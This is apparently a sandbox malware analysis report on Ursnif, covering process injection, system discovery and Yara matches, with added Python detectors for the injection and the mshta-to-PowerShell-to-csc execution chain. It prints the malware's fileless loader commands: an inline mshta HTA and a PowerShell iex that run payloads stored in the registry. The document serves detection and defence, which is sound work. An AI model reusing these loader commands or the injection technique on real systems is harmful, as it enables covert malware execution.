Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File written: C:\Users\user\AppData\Local\Temp\idzehqcm\idzehqcm.0.cs
Creates a thread in another existing process (thread injection)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread created: C:\Windows\explorer.exe EIP: 9B851580
Source: C:\Windows\System32\control.exe Thread created: C:\Windows\explorer.exe EIP: 9B851580
Source: C:\Windows\explorer.exe Thread created: C:\Windows\System32\RuntimeBroker.exe EIP: 9B851580
Source: C:\Windows\explorer.exe Thread created: C:\Windows\System32\RuntimeBroker.exe EIP: 9B851580
Source: C:\Windows\explorer.exe Thread created: unknown EIP: 9B851580
Source: C:\Windows\explorer.exe Thread created: unknown EIP: 9B851580
Source: C:\Windows\explorer.exe Thread created: unknown EIP: 9B851580
Injects code into the Windows Explorer (explorer.exe)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: PID: 3472 base: EB0000 value: 00
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: PID: 3472 base: 7FFA9B851580 value: EB
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: PID: 3472 base: 3060000 value: 80
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: PID: 3472 base: 7FFA9B851580 value: 40
Source: C:\Windows\System32\control.exe Memory written: PID: 3472 base: EAE000 value: 00
Source: C:\Windows\System32\control.exe Memory written: PID: 3472 base: 7FFA9B851580 value: EB
Source: C:\Windows\System32\control.exe Memory written: PID: 3472 base: 30B0000 value: 80
Source: C:\Windows\System32\control.exe Memory written: PID: 3472 base: 7FFA9B851580 value: 40
Maps a DLL or memory area into another process
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: unknown target: C:\Windows\System32\control.exe protection: execute and read and write
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Windows\System32\control.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Windows\System32\control.exe Section loaded: unknown target: unknown protection: execute and read and write
Source: C:\Windows\explorer.exe Section loaded: unknown target: C:\Windows\System32\RuntimeBroker.exe protection: execute and read and write
Source: C:\Windows\explorer.exe Section loaded: unknown target: C:\Windows\System32\RuntimeBroker.exe protection: execute and read and write
Source: C:\Windows\explorer.exe Section loaded: unknown target: unknown protection: execute and read and write
Source: C:\Windows\explorer.exe Section loaded: unknown target: unknown protection: execute and read and write
Source: C:\Windows\explorer.exe Section loaded: unknown target: C:\Program Files\internet explorer\iexplore.exe protection: execute and read and write
Modifies the context of a thread in another process (thread injection)
Source: C:\Windows\SysWOW64\regsvr32.exe Thread register set: target process: 6684
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread register set: target process: 3472
Source: C:\Windows\System32\control.exe Thread register set: target process: 3472
Source: C:\Windows\System32\control.exe Thread register set: target process: 5700
Source: C:\Windows\explorer.exe Thread register set: target process: 4016
Source: C:\Windows\explorer.exe Thread register set: target process: 4288
Source: C:\Windows\explorer.exe Thread register set: target process: 4448
Source: C:\Windows\explorer.exe Thread register set: target process: 5796
Source: C:\Windows\explorer.exe Thread register set: target process: 4308
Writes to foreign memory regions
Source: C:\Windows\SysWOW64\regsvr32.exe Memory written: C:\Windows\System32\control.exe base: 7FF6457212E0
Source: C:\Windows\SysWOW64\regsvr32.exe Memory written: C:\Windows\System32\control.exe base: 250000
Source: C:\Windows\SysWOW64\regsvr32.exe Memory written: C:\Windows\System32\control.exe base: 7FF6457212E0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\explorer.exe base: EB0000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\explorer.exe base: 7FFA9B851580
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\explorer.exe base: 3060000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\explorer.exe base: 7FFA9B851580
Source: C:\Windows\System32\control.exe Memory written: C:\Windows\explorer.exe base: EAE000
Source: C:\Windows\System32\control.exe Memory written: C:\Windows\explorer.exe base: 7FFA9B851580
Source: C:\Windows\System32\control.exe Memory written: C:\Windows\explorer.exe base: 30B0000
Source: C:\Windows\System32\control.exe Memory written: C:\Windows\explorer.exe base: 7FFA9B851580
Source: C:\Windows\explorer.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 46DA8F7000
Source: C:\Windows\explorer.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 7FFA9B851580
Source: C:\Windows\explorer.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 2413CAD0000
Source: C:\Windows\explorer.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 7FFA9B851580
Source: C:\Windows\explorer.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 8DFD4F1000
Source: C:\Windows\explorer.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 7FFA9B851580
Source: C:\Windows\explorer.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 1E766730000
Source: C:\Windows\explorer.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 7FFA9B851580
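Read together, the "Memory protected", "Memory written" and "Thread created" events above show one repeating sequence: the injecting process makes the page at 7FFA9B851580 in the target writable and executable, writes a single byte (EB, the opcode of a two-byte short JMP), starts a thread at that address, and then flips the page back to execute-read. The same address appears in explorer.exe, RuntimeBroker.exe and the "unknown" targets because system DLLs are mapped at the same base in every process for a given boot, and the report prints the thread entry point as the low 32 bits (9B851580) of that address. That is the editor's reading of the lines, not a statement from the report. The following Python is an added example, not part of this report or of the sandbox: it parses constructed lines in the report's own format and flags a source process that made a page in a foreign process writable and executable, wrote into it, and then started a thread whose entry point lies in that page. It assumes target paths without spaces and accepts a 32-bit-truncated EIP, both assumptions drawn from the lines above.

```python
import re
from collections import defaultdict

# Constructed sample events in the report's own line format. The explorer.exe ->
# RuntimeBroker.exe lines mirror the analysis above; the control.exe and
# svchost.exe lines are made up to show what the rule must NOT flag.
SAMPLE_EVENTS = r"""
Source: C:\Windows\explorer.exe Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 2413CAD0000 protect: page execute and read and write
Source: C:\Windows\explorer.exe Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFA9B851580 protect: page execute and read and write
Source: C:\Windows\explorer.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 2413CAD0000
Source: C:\Windows\explorer.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 7FFA9B851580
Source: C:\Windows\explorer.exe Thread created: C:\Windows\System32\RuntimeBroker.exe EIP: 9B851580
Source: C:\Windows\explorer.exe Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFA9B851580 protect: page execute read
Source: C:\Windows\System32\control.exe Memory allocated: C:\Windows\explorer.exe base: 30B0000 protect: page execute and read and write
Source: C:\Windows\System32\control.exe Memory written: C:\Windows\explorer.exe base: 30B0000
Source: C:\Windows\System32\svchost.exe Memory allocated: C:\Windows\System32\svchost.exe base: 1F000000 protect: page execute and read and write
Source: C:\Windows\System32\svchost.exe Memory written: C:\Windows\System32\svchost.exe base: 1F000000
Source: C:\Windows\System32\svchost.exe Thread created: C:\Windows\System32\svchost.exe EIP: 1F000000
"""

# Assumption: source and target paths contain no spaces (true for every memory
# event in the report above; "unknown" targets parse the same way).
EVENT = re.compile(
    r"^Source: (?P<src>\S+) (?P<kind>Memory allocated|Memory protected|Memory written|Thread created): "
    r"(?P<target>\S+) (?:base: (?P<base>[0-9A-Fa-f]+)(?: protect: (?P<prot>.*))?|EIP: (?P<eip>[0-9A-Fa-f]+))$"
)

PAGE_SHIFT = 12  # 4 KiB pages; VirtualProtectEx granularity


def page_of(addr):
    return addr >> PAGE_SHIFT


def same_page(page, eip):
    """True if the thread entry point falls in `page`. The report prints EIP as a
    32-bit value even for 64-bit targets (assumption: base 7FFA9B851580 is shown
    as EIP 9B851580), so a match on the low 20 page bits is also accepted."""
    ep = eip >> PAGE_SHIFT
    return ep == page or ep == (page & 0xFFFFF)


def find_injections(text):
    """One finding per thread start that lands in a page which the same source
    process earlier made writable+executable in a *foreign* process and wrote to."""
    state = defaultdict(lambda: {"wx": False, "written": False, "base": None})
    findings = []
    for line in text.splitlines():
        m = EVENT.match(line.strip())
        if not m:
            continue
        src, tgt, kind = m["src"], m["target"], m["kind"]
        if src.lower() == tgt.lower():
            continue  # self-modification is not cross-process injection
        if kind in ("Memory allocated", "Memory protected"):
            prot = (m["prot"] or "").lower()
            if "execute" in prot and "write" in prot:
                base = int(m["base"], 16)
                st = state[(src, tgt, page_of(base))]
                st["wx"], st["base"] = True, base
        elif kind == "Memory written":
            base = int(m["base"], 16)
            state[(src, tgt, page_of(base))]["written"] = True
        else:  # Thread created
            eip = int(m["eip"], 16)
            for (s, t, pg), st in state.items():
                if s == src and t == tgt and st["wx"] and st["written"] and same_page(pg, eip):
                    findings.append({"source": src, "target": tgt,
                                     "page": f"{st['base']:X}", "eip": f"{eip:X}"})
    return findings


if __name__ == "__main__":
    for f in find_injections(SAMPLE_EVENTS):
        print(f"{f['source']} -> {f['target']}: RWX page {f['page']} written, thread at {f['eip']}")
```

Only the explorer.exe to RuntimeBroker.exe sequence is reported: control.exe allocated and wrote but started no thread in the sample, and the svchost.exe lines are a process touching its own memory. The later "page execute read" restore is deliberately ignored, since by then the thread already exists.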
Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c 'C:\Program Files\Internet Explorer\iexplore.exe'
Source: C:\Windows\SysWOW64\regsvr32.exe Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Program Files\internet explorer\iexplore.exe C:\Program Files\Internet Explorer\iexplore.exe
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi))
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\jnnfehtw\jnnfehtw.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\idzehqcm\idzehqcm.cmdline'
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES7BB2.tmp' 'c:\Users\user\AppData\Local\Temp\jnnfehtw\CSC5C15B44BFF13433EA0F7DE991C56E45D.TMP'
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES9024.tmp' 'c:\Users\user\AppData\Local\Temp\idzehqcm\CSCED83507F240441029C9C6A47F2CB5CFA.TMP'
Source: C:\Windows\System32\control.exe Process created: unknown unknown
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Source: unknown Process created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\Actidsrv'));if(!window.flag)close()</script>'
Source: explorer.exe, 00000025.00000000.456640117.00000000089FF000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000026.00000000.435568781.000002413A990000.00000002.00000001.sdmp, RuntimeBroker.exe, 00000027.00000000.444062037.000001E765260000.00000002.00000001.sdmp Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000025.00000000.432158802.0000000001640000.00000002.00000001.sdmp, RuntimeBroker.exe, 00000026.00000000.435568781.000002413A990000.00000002.00000001.sdmp, RuntimeBroker.exe, 00000027.00000000.444062037.000001E765260000.00000002.00000001.sdmp Binary or memory string: Progman
Source: explorer.exe, 00000025.00000000.432158802.0000000001640000.00000002.00000001.sdmp, RuntimeBroker.exe, 00000026.00000000.435568781.000002413A990000.00000002.00000001.sdmp, RuntimeBroker.exe, 00000027.00000000.444062037.000001E765260000.00000002.00000001.sdmp Binary or memory string: SProgram Managerl
Source: explorer.exe, 00000025.00000000.431964628.0000000001128000.00000004.00000020.sdmp Binary or memory string: ProgmanOMEa
Source: explorer.exe, 00000025.00000000.432158802.0000000001640000.00000002.00000001.sdmp, RuntimeBroker.exe, 00000026.00000000.435568781.000002413A990000.00000002.00000001.sdmp, RuntimeBroker.exe, 00000027.00000000.444062037.000001E765260000.00000002.00000001.sdmp Binary or memory string: Shell_TrayWnd,
Source: explorer.exe, 00000025.00000000.432158802.0000000001640000.00000002.00000001.sdmp, RuntimeBroker.exe, 00000026.00000000.435568781.000002413A990000.00000002.00000001.sdmp, RuntimeBroker.exe, 00000027.00000000.444062037.000001E765260000.00000002.00000001.sdmp Binary or memory string: Progmanlock
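The process-creation lines above record the whole living-off-the-land chain: mshta.exe runs an inline about: HTA that reads the next stage out of HKCU\Software\AppDataLow\Software\Microsoft\<GUID> with WScript.Shell.RegRead and eval()s it; that stage launches powershell.exe, which pulls a byte-array (REG_BINARY) value from the same key with Get-ItemProperty, ASCII-decodes it and hands it to Invoke-Expression; and PowerShell then drives csc.exe and cvtres.exe from a .cmdline response file under %TEMP%. The two Sigma hits in the summary ("MSHTA Spawning Windows Shell" and "Dot net compiler compiles file from suspicious location") key on exactly these parent/child and command-line relationships. The following Python is an added example, not part of this report or of any Sigma rule set: it applies those checks, plus two command-line checks on the mshta and PowerShell stages, to constructed Sysmon-style process-creation records. The PIDs, the benign backup-script and Visual Studio records, and the field names are invented for the example; the malicious command lines mirror the ones in the report.

```python
import ntpath
import re

# Constructed Sysmon-style process-creation records. The three malicious
# command lines mirror the chain in the report above (registry GUID included);
# PIDs and the two benign records (2000, 2001) are invented.
EVENTS = [
    {"pid": 1000, "ppid": 900, "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": r"mshta.exe about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').regread('HKCU\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\Actidsrv'));if(!window.flag)close()</script>"},
    {"pid": 1001, "ppid": 1000, "parent_image": r"C:\Windows\System32\mshta.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell.exe iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi))"},
    {"pid": 1002, "ppid": 1001, "parent_image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "image": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe",
     "cmdline": r'csc.exe /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\jnnfehtw\jnnfehtw.cmdline"'},
    {"pid": 2000, "ppid": 1900, "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell.exe -NoProfile -File C:\Scripts\nightly-backup.ps1"},
    {"pid": 2001, "ppid": 1950, "parent_image": r"C:\Program Files\Microsoft Visual Studio\Common7\IDE\devenv.exe",
     "image": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe",
     "cmdline": r'csc.exe /noconfig @"C:\src\app\obj\Debug\app.rsp"'},
]

SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe"}
POWERSHELL = {"powershell.exe", "pwsh.exe"}
COMPILERS = {"csc.exe", "vbc.exe"}
# A @response-file argument pointing at a .cmdline under a user's Temp directory,
# which is where PowerShell Add-Type / CodeDOM compiles land.
TEMP_CMDLINE = re.compile(r"""@["']?[a-z]:\\users\\[^\\]+\\appdata\\local\\temp\\[^"']+\.cmdline""", re.I)


def _name(path):
    # ntpath so Windows paths split correctly even when this runs on Linux
    return ntpath.basename(path).lower()


def mshta_spawns_shell(ev):
    """Sigma 'MSHTA Spawning Windows Shell': mshta.exe as parent of a script host."""
    return _name(ev["parent_image"]) == "mshta.exe" and _name(ev["image"]) in SHELLS


def mshta_inline_registry_eval(ev):
    """Inline about: HTA that reads a registry value and eval()s it (stage one above)."""
    c = ev["cmdline"].lower()
    return (_name(ev["image"]) == "mshta.exe" and "<hta:application>" in c
            and "regread(" in c and "eval(" in c)


def powershell_registry_payload(ev):
    """Invoke-Expression over a value read from HKCU\\...\\AppDataLow (stage two above)."""
    c = ev["cmdline"].lower()
    return (_name(ev["image"]) in POWERSHELL
            and re.search(r"\b(iex|invoke-expression)\b", c) is not None
            and re.search(r"\b(gp|get-itemproperty)\b", c) is not None
            and "appdatalow" in c)


def csc_compile_from_temp(ev):
    """Sigma 'Dot net compiler compiles file from suspicious location', narrowed
    to a PowerShell parent so normal build tooling does not trip it."""
    return (_name(ev["image"]) in COMPILERS
            and _name(ev["parent_image"]) in POWERSHELL
            and TEMP_CMDLINE.search(ev["cmdline"]) is not None)


RULES = {
    "mshta_spawns_shell": mshta_spawns_shell,
    "mshta_inline_registry_eval": mshta_inline_registry_eval,
    "powershell_registry_payload": powershell_registry_payload,
    "csc_compile_from_temp": csc_compile_from_temp,
}


def evaluate(events):
    """Return sorted (rule, pid) pairs for every record that trips a rule."""
    return sorted((name, ev["pid"]) for ev in events
                  for name, rule in RULES.items() if rule(ev))


def chain(events, pid):
    """Walk parent links back to the root so a hit can be shown with its ancestry."""
    by_pid = {ev["pid"]: ev for ev in events}
    names = []
    while pid in by_pid:
        names.append(_name(by_pid[pid]["image"]))
        pid = by_pid[pid]["ppid"]
    return " <- ".join(names)


if __name__ == "__main__":
    for rule, pid in evaluate(EVENTS):
        print(f"{rule:30} pid {pid}: {chain(EVENTS, pid)}")
```

Each malicious record trips at least one rule while neither benign record does; the csc.exe rule is intentionally scoped to a PowerShell parent and a Temp-resident .cmdline, because csc.exe itself is a signed Microsoft binary that build tools invoke constantly. The chain() output (csc.exe <- powershell.exe <- mshta.exe) is the same ancestry the report lists line by line under "Creates a process in suspended mode".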

Language, Device and Operating System Detection:

Contains functionality to query CPU information (cpuid)
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_001CA12A cpuid 1_2_001CA12A
Queries the installation date of Windows
Source: C:\Windows\SysWOW64\regsvr32.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion InstallDate
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation (2 identical events)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation (4 identical events)
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_00E55F90 CreateNamedPipeA,GetLastError,CloseHandle,GetLastError, 1_2_00E55F90
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_001C12E8 GetSystemTimeAsFileTime,_aulldiv,_snwprintf,CreateFileMappingW,GetLastError,GetLastError,MapViewOfFile,GetLastError,CloseHandle,GetLastError, 1_2_001C12E8
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_001CA12A wsprintfA,RtlAllocateHeap,GetUserNameW,RtlAllocateHeap,GetUserNameW,HeapFree,GetComputerNameW,GetComputerNameW,RtlAllocateHeap,GetComputerNameW,HeapFree, 1_2_001CA12A
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_001C7A5D CreateEventA,GetVersion,GetCurrentProcessId,OpenProcess,GetLastError, 1_2_001C7A5D
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information:

Yara detected Ursnif
Source: Yara match File source: 00000001.00000003.342289663.0000000005318000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.342468816.0000000005318000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000025.00000002.578433552.0000000003B8E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000027.00000002.570719578.000001E7666AE000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.342346721.0000000005318000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.412411530.0000000000500000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.342261211.0000000005318000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000022.00000003.422060985.0000021EAC2F0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000001A.00000003.422165478.0000028E65B80000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.436183951.0000000000E50000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000025.00000003.432265518.0000000003070000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.342443739.0000000005318000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.342379670.0000000005318000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.352943845.000000000519B000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000026.00000002.574832418.000002413CA4E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000025.00000000.437313666.0000000003B8E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000025.00000002.589013804.00000000066DE000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000022.00000002.474554725.00000000001CE000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.342460182.0000000005318000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.342426080.0000000005318000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: RuntimeBroker.exe PID: 4288, type: MEMORY
Source: Yara match File source: Process Memory Space: RuntimeBroker.exe PID: 4016, type: MEMORY
Source: Yara match File source: Process Memory Space: powershell.exe PID: 5236, type: MEMORY
Source: Yara match File source: Process Memory Space: regsvr32.exe PID: 4616, type: MEMORY
Source: Yara match File source: Process Memory Space: control.exe PID: 6684, type: MEMORY
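The twenty memory sources above are dump identifiers, and the fields before the .sdmp suffix are what separates a hit in executable memory (the unpacked bot) from a hit in a read/write staging buffer. The triage script below is an added example, not part of the Joe Sandbox report: its field layout (process index, dump kind, sequence number, base address, protection, flags) is an assumption inferred from the identifiers on this page, reading the protection field as a Windows PAGE_* constant and the dump-kind values (0 start, 2 final, 3 runtime) are assumptions, and the only process index it names (1 = regsvr32.exe) is taken from the report's 1_2_... code-function entries.

```python
"""Triage of the memory regions behind this report's 'Yara detected Ursnif' hits.

Added example, not part of the Joe Sandbox report. The identifier layout it
parses is an assumption inferred from the identifiers on this page:
    <proc index>.<dump kind>.<sequence>.<base address>.<protection>.<flags>.sdmp
Process index 1 is regsvr32.exe (its 'Code function: 1_2_...' entries share that
prefix); the last field is not explained on the page and is kept raw.
"""
import re
from typing import NamedTuple

# Windows PAGE_EXECUTE* protection bits (0x10, 0x20, 0x40, 0x80 in memoryapi.h).
# Reading the fifth field as a PAGE_* constant is an assumption; it agrees with
# the one dump (0x00E50000) that contains regsvr32's listed code functions.
EXECUTABLE_MASK = 0xF0
# Dump kind as assumed here: 0 = at process start, 2 = final dump at exit,
# 3 = taken while the process was running.
DUMP_KIND = {0: "start", 2: "final", 3: "runtime"}

_DUMP_RE = re.compile(
    r"^(?P<proc>[0-9A-F]{8})\.(?P<kind>[0-9A-F]{8})\.(?P<seq>\d+)\."
    r"(?P<base>[0-9A-F]{16})\.(?P<prot>[0-9A-F]{8})\.(?P<flags>[0-9A-F]{8})\.sdmp$"
)
_YARA_LINE_RE = re.compile(r"File source:\s*(?P<src>\S+\.sdmp),\s*type:\s*MEMORY")


class DumpRegion(NamedTuple):
    proc: int
    kind: str
    seq: int
    base: int
    prot: int
    flags: int

    @property
    def executable(self) -> bool:
        return bool(self.prot & EXECUTABLE_MASK)


def parse_dump_id(ident: str) -> DumpRegion:
    m = _DUMP_RE.match(ident.strip())
    if not m:
        raise ValueError(f"not a memory dump identifier: {ident!r}")
    kind = int(m["kind"], 16)
    return DumpRegion(int(m["proc"], 16), DUMP_KIND.get(kind, f"kind_{kind}"),
                      int(m["seq"]), int(m["base"], 16), int(m["prot"], 16),
                      int(m["flags"], 16))


def dump_ids_from_report(text: str) -> list:
    """Pull .sdmp identifiers out of 'Source: Yara match File source: ...' lines.
    'Process Memory Space' hits carry no identifier and are skipped."""
    return [m["src"] for m in map(_YARA_LINE_RE.search, text.splitlines()) if m]


def executable_hits(idents) -> list:
    """Hits whose region was executable when dumped: unpacked code rather than
    a read/write staging buffer."""
    return [r for r in map(parse_dump_id, idents) if r.executable]


def region_for_address(idents, proc: int, address: int):
    """Nearest dump base at or below `address` in process `proc`. Region sizes
    are not in the report, so this only names the best candidate dump."""
    regions = [r for r in map(parse_dump_id, idents)
               if r.proc == proc and r.base <= address]
    return max(regions, key=lambda r: r.base, default=None)


# Lines copied from the 'Yara detected Ursnif' list on this page.
REPORT_TEXT = """\
Source: Yara match File source: 00000001.00000003.342289663.0000000005318000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.342468816.0000000005318000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000025.00000002.578433552.0000000003B8E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000027.00000002.570719578.000001E7666AE000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.342346721.0000000005318000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.412411530.0000000000500000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.342261211.0000000005318000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000022.00000003.422060985.0000021EAC2F0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000001A.00000003.422165478.0000028E65B80000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.436183951.0000000000E50000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000025.00000003.432265518.0000000003070000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.342443739.0000000005318000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.342379670.0000000005318000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.352943845.000000000519B000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000026.00000002.574832418.000002413CA4E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000025.00000000.437313666.0000000003B8E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000025.00000002.589013804.00000000066DE000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000022.00000002.474554725.00000000001CE000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.342460182.0000000005318000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.342426080.0000000005318000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: regsvr32.exe PID: 4616, type: MEMORY
"""
YARA_HITS = dump_ids_from_report(REPORT_TEXT)

if __name__ == "__main__":
    for r in executable_hits(YARA_HITS):
        print(f"proc {r.proc:#x} {r.kind} dump at {r.base:#x}: prot={r.prot:#x} (executable)")
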